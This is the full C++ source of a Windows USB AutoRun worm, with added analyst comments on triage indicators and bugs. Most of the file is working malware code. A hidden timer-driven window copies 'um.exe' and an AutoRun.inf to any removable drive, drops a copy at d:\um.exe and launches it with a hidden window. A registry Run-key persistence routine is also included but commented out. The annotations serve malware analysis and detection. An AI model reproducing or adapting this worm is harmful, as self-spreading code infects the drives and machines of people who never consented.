#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>
// Analyst summary (from the code in this file): this is the source of a
// removable-media AutoRun worm. A hidden window polls every 5 seconds; one
// branch copies the executable and an AutoRun.inf to a removable drive, the
// other copies the executable to the root of d: and launches it hidden.
// Artifacts visible in this file that can be used for triage: the image name
// "um.exe", an AutoRun.inf that references "um.exe e", and the window class
// "virus". Disabling AutoRun for removable media blocks the AutoRun.inf
// launch path this file relies on.
#define TIMER 1//timer identifier passed to SetTimer and KillTimer
#define WM_FROMC WM_USER+0//custom message, author's label: started from drive C; WndProc answers it with CopyToUAndSet
#define WM_FROMU WM_USER+1//custom message, author's label: started from the USB drive; WndProc answers it with CopyToSysAndSet
//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//window procedure
//functions used when the program was started from the USB drive
BOOL FileExist(TCHAR *path);//test whether a file exists
BOOL GetSelfPath(TCHAR *path);//get the path of the running executable
BOOL FindU(TCHAR *u);//check whether a removable drive exists; called with the 2-element global U
BOOL GetSysPath(TCHAR *path);//get the system directory
BOOL CopyToSysAndSet(HWND hwnd);//author's label: copy itself to the system directory and configure it
BOOL SetFileAttrib(TCHAR *path);//set the attributes of the file that path points to
//BOOL RegAutoRun(TCHAR *path);//registry auto-start; disabled, the definition is commented out as well
//functions used when the program was started from the fixed disk
BOOL CopyToUAndSet();//copy itself to the USB drive
BOOL CreateAutoRunFile(TCHAR *path);//create the autorun.inf file on the USB drive
BOOL FindSelf();//test whether a process with its own image name is already running
//global variable
TCHAR szExePath[MAX_PATH];//path of the running executable, filled in by GetSelfPath
TCHAR U[2];//drive letter and ':' of the removable drive, filled in by FindU
TCHAR szSysPath[MAX_PATH];//system directory, filled in by GetSysPath; not read again in this file
//constant
// Image name of every dropped copy and the name FindSelf looks for.
const TCHAR *szExeName="um.exe";
// Name of the file written to the root of the removable drive.
const TCHAR *szAutoRunFile="AutoRun.inf";
// Entry point. Registers a window class named "virus", creates one window of
// that class and runs the message loop; all further activity is in WndProc.
// The window is created with WS_DISABLED, zero size and no WS_VISIBLE, and
// ShowWindow is never called in this file, so the process shows no UI.
// Returns msg.wParam of the message that ended the loop, or 0 when the class
// registration failed.
// Triage note: the fixed class name "virus" can be matched when enumerating
// windows on a suspect host.
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,LPSTR
szCmdLine, int iCmdShow)
{
static TCHAR szAppName[]=TEXT ("virus");
HWND hwnd;
MSG msg;
// Every WNDCLASS member is assigned below; no icon, cursor, brush or menu.
WNDCLASS wndclass;
wndclass.style=0;
wndclass.lpfnWndProc=WndProc;
wndclass.cbClsExtra=0;
wndclass.cbWndExtra=0;
wndclass.hInstance=hInstance;
wndclass.hIcon=0;
wndclass.hCursor=0;
wndclass.hbrBackground=0;
wndclass.lpszMenuName=NULL;
wndclass.lpszClassName=szAppName;
if (!RegisterClass (&wndclass))
{
// The only user-visible output in the file.
MessageBox (NULL,TEXT("Program requires Windows NT!"),szAppName,MB_ICONERROR);
return 0;
}
// The returned handle is not checked; WM_CREATE is delivered to WndProc
// during this call, which is where the timer is started.
hwnd = CreateWindow (szAppName, NULL,WS_DISABLED,0,0,0,0,NULL, NULL,hInstance, NULL);
// Standard message pump; runs until GetMessage returns 0.
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage (&msg);
DispatchMessage (&msg);
}
return msg.wParam;
}
// Window procedure that drives the whole program from a 5-second timer.
// WM_CREATE fills the global paths and starts the timer. Each WM_TIMER picks
// one of two branches from the first character of the executable's own path:
// 'D' means "running from the fixed disk" and leads to CopyToUAndSet once a
// removable drive is found; any other letter leads to CopyToSysAndSet.
// NOTE(review): the message names and comments speak of drive C, but the
// check here and the target in CopyToSysAndSet both use drive D.
// Behavioural indicator: a windowless process that touches removable drives
// and d:\ on a fixed 5-second cadence.
LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM
lParam)
{
switch(message)
{
// set up the global variables used by the handlers below
case WM_CREATE:
GetSysPath(szSysPath);//get the system directory
SetTimer(hwnd,TIMER,5000,NULL);//start the timer, 5000 ms interval
GetSelfPath(szExePath);//get the path of the running executable
return 0;
//timer message
case WM_TIMER:
// Case-sensitive comparison against an upper-case 'D'.
if(szExePath[0]=='D')
{
// FindU stores the removable drive's letter in the global U.
if(FindU(U))
{
SendMessage(hwnd,WM_FROMC,0,0);
}
}
else
SendMessage(hwnd,WM_FROMU,0,0);
return 0;
// Drop the executable and AutoRun.inf onto the removable drive.
case WM_FROMC:
CopyToUAndSet();
return 0;
// Copy to the fixed disk, or launch the copy that is already there.
case WM_FROMU:
CopyToSysAndSet(hwnd);
return 0;
case WM_DESTROY:
KillTimer(hwnd,TIMER);
PostQuitMessage(0);
return 0;
}
return ::DefWindowProc(hwnd, message, wParam, lParam);
}
// Stores the full path of the current process's executable in path.
// path must have room for MAX_PATH characters.
// Returns TRUE when GetModuleFileName reports a non-zero length, else FALSE.
BOOL GetSelfPath(TCHAR *path)
{
if(GetModuleFileName(NULL,path,MAX_PATH))//NULL module handle: path of the program's own executable
{
return TRUE;
}
else
return FALSE;
}
// Looks for a removable drive by probing the letters C to Z in order.
// On success u[0] holds the first letter whose drive type is DRIVE_REMOVABLE
// and u[1] holds ':'; the function returns TRUE. Returns FALSE when no letter
// matches, leaving 'Z' in u[0].
// NOTE(review): only u[0] and u[1] are written here and the caller passes the
// two-element global U, so this function writes no string terminator.
BOOL FindU(TCHAR *u)
{
u[1]=':';
for(char d='C';d<='Z';d++)//iterate over C to Z
{
u[0]=d;
if(GetDriveType(u)==DRIVE_REMOVABLE)//is this a removable drive?
return TRUE;
}
return FALSE;
}
// Stores the Windows system directory in path (room for MAX_PATH characters).
// The length returned by GetSystemDirectory is passed back as the BOOL
// result, so any non-zero length reads as success.
BOOL GetSysPath(TCHAR *path)
{
return GetSystemDirectory(path,MAX_PATH);//get the system directory
}
// Installs or launches the copy on the fixed disk.
// The target is the hard-coded path "d:\um.exe"; despite the function name
// and the original comments, the system directory in szSysPath is not used.
// If the target does not exist, the running executable is copied there and
// the result of SetFileAttrib on the copy is returned. If it already exists
// and FindSelf finds no process named um.exe, the copy is started with a
// hidden window. Every path other than the first copy returns FALSE.
// hwnd is only referenced by commented-out code.
// Triage note: a file named um.exe in the root of d: is the on-disk artifact
// of this branch; the registry Run-key call is disabled, so this function
// itself registers no auto-start entry.
BOOL CopyToSysAndSet(HWND hwnd)
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,"d:");
lstrcat(szPath,"\\");
lstrcat(szPath,szExeName);//author's comment: full path of the copy in the system directory (actual value: d:\um.exe)
if(!FileExist(szPath))//check whether the copy already exists
{
// FALSE: overwrite if the file appeared in the meantime. The result
// of CopyFile itself is not checked.
CopyFile(szExePath,szPath,FALSE);
//RegAutoRun(szPath);
return SetFileAttrib(szPath);
}
else
{
if(!FindSelf())//check whether a um.exe process is already running
WinExec(szPath,SW_HIDE);//if not, run the copy with its window hidden
//WinExec(szPath,SW_HIDE);
//SendMessage(hwnd,WM_CLOSE,0,0);//terminate itself
}
return FALSE;
}
// Reports whether the file or directory named by path exists.
// Returns TRUE only when PathFileExists returns exactly 1, otherwise FALSE.
BOOL FileExist(TCHAR *path)//check whether the file that path points to exists
{
int result;
result=PathFileExists(path);
if(result==1)
return TRUE;
else
return FALSE;
}
// Sets the attributes of the file at path to FILE_ATTRIBUTE_NORMAL and
// returns the result of SetFileAttributes.
// FILE_ATTRIBUTE_NORMAL means no other attribute is set, so the dropped files
// carry no hidden, system or read-only flag and show up in an ordinary
// directory listing.
BOOL SetFileAttrib(TCHAR *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_NORMAL);
}
/*BOOL RegAutoRun(TCHAR *path)//modify the registry (disabled: this whole function is commented out and is never compiled)
{
HKEY hkey;
if(RegOpenKey
(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",
&hkey)==ERROR_SUCCESS)
{
RegSetvalueEx(hkey,szExeName,0,REG_SZ,(BYTE*)path,lstrlen(path));
RegCloseKey(hkey);
return TRUE;
}
else
return FALSE;
}*/
// Drops the payload onto the removable drive whose letter is in the global U.
// Builds two paths in the drive's root, one for szExeName and one for
// szAutoRunFile. AutoRun.inf is rewritten on every call because the existence
// check around it is commented out; the executable is copied only when it is
// not there yet. Returns the result of SetFileAttrib on the new copy, or
// FALSE when the executable was already present.
// NOTE(review): U is used here as a string although the code that fills it
// writes only two characters.
// Triage note: um.exe together with an AutoRun.inf in the root of a removable
// drive is the artifact of this branch, and AutoRun.inf keeps being rewritten
// on each timer tick while the drive stays attached.
BOOL CopyToUAndSet()
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,U);
lstrcat(szPath,"\\");
lstrcat(szPath,szExeName);//full path of the executable on the USB drive
TCHAR szAutoFile[MAX_PATH];
lstrcpy(szAutoFile,U);
lstrcat(szAutoFile,"\\");
lstrcat(szAutoFile,szAutoRunFile);
//if(!FileExist(szAutoFile))
//{
// Return values of both calls are ignored.
CreateAutoRunFile(szAutoFile);
SetFileAttrib(szAutoFile);
//}
if(!FileExist(szPath))
{
// The result of CopyFile is not checked.
CopyFile(szExePath,szPath,FALSE);
return SetFileAttrib(szPath);
}
return FALSE;
}
// Writes the AutoRun.inf file at path, replacing any existing content.
// The file holds one [AutoRun] section whose open, shellexecute and
// shell\Auto\command entries all run "um.exe e".
// Returns TRUE when the stream opened and the lines were written, FALSE when
// the open failed.
// Triage note: an AutoRun.inf on removable media whose entries name um.exe
// matches this file's output line for line.
BOOL CreateAutoRunFile(TCHAR *path) //create an autorun.inf file on the USB drive
{
// ofstream comes from the pre-standard <fstream.h> header included above.
ofstream fout;
fout.open(path);
if(fout)
{
fout<<"[AutoRun]"<<endl;
fout<<"open=um.exe e"<<endl;
fout<<"shellexecute=um.exe e"<<endl;
fout<<"shell\\Auto\\command=um.exe e"<<endl;
//fout<<"shell=Auto"<<endl;
fout.close();
return TRUE;
}
return FALSE;
}
// Reports whether any process in a system-wide snapshot has the image name
// held in szExeName ("um.exe").
// The comparison uses lstrcmp, so it is case-sensitive and matches the file
// name only, not the path. Returns TRUE on the first match, FALSE otherwise.
// The snapshot handle is closed on both return paths; it is not checked
// against failure before use.
BOOL FindSelf(){
PROCESSENTRY32 pe;
HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
// dwSize has to be set before Process32First is called.
pe.dwSize=sizeof(PROCESSENTRY32);
if(Process32First(hShot,&pe)){
do{
if(lstrcmp(pe.szExeFile,szExeName)==0)
{
CloseHandle(hShot);
return TRUE;
}
}while(Process32Next(hShot,&pe));
}
CloseHandle(hShot);
return FALSE;
}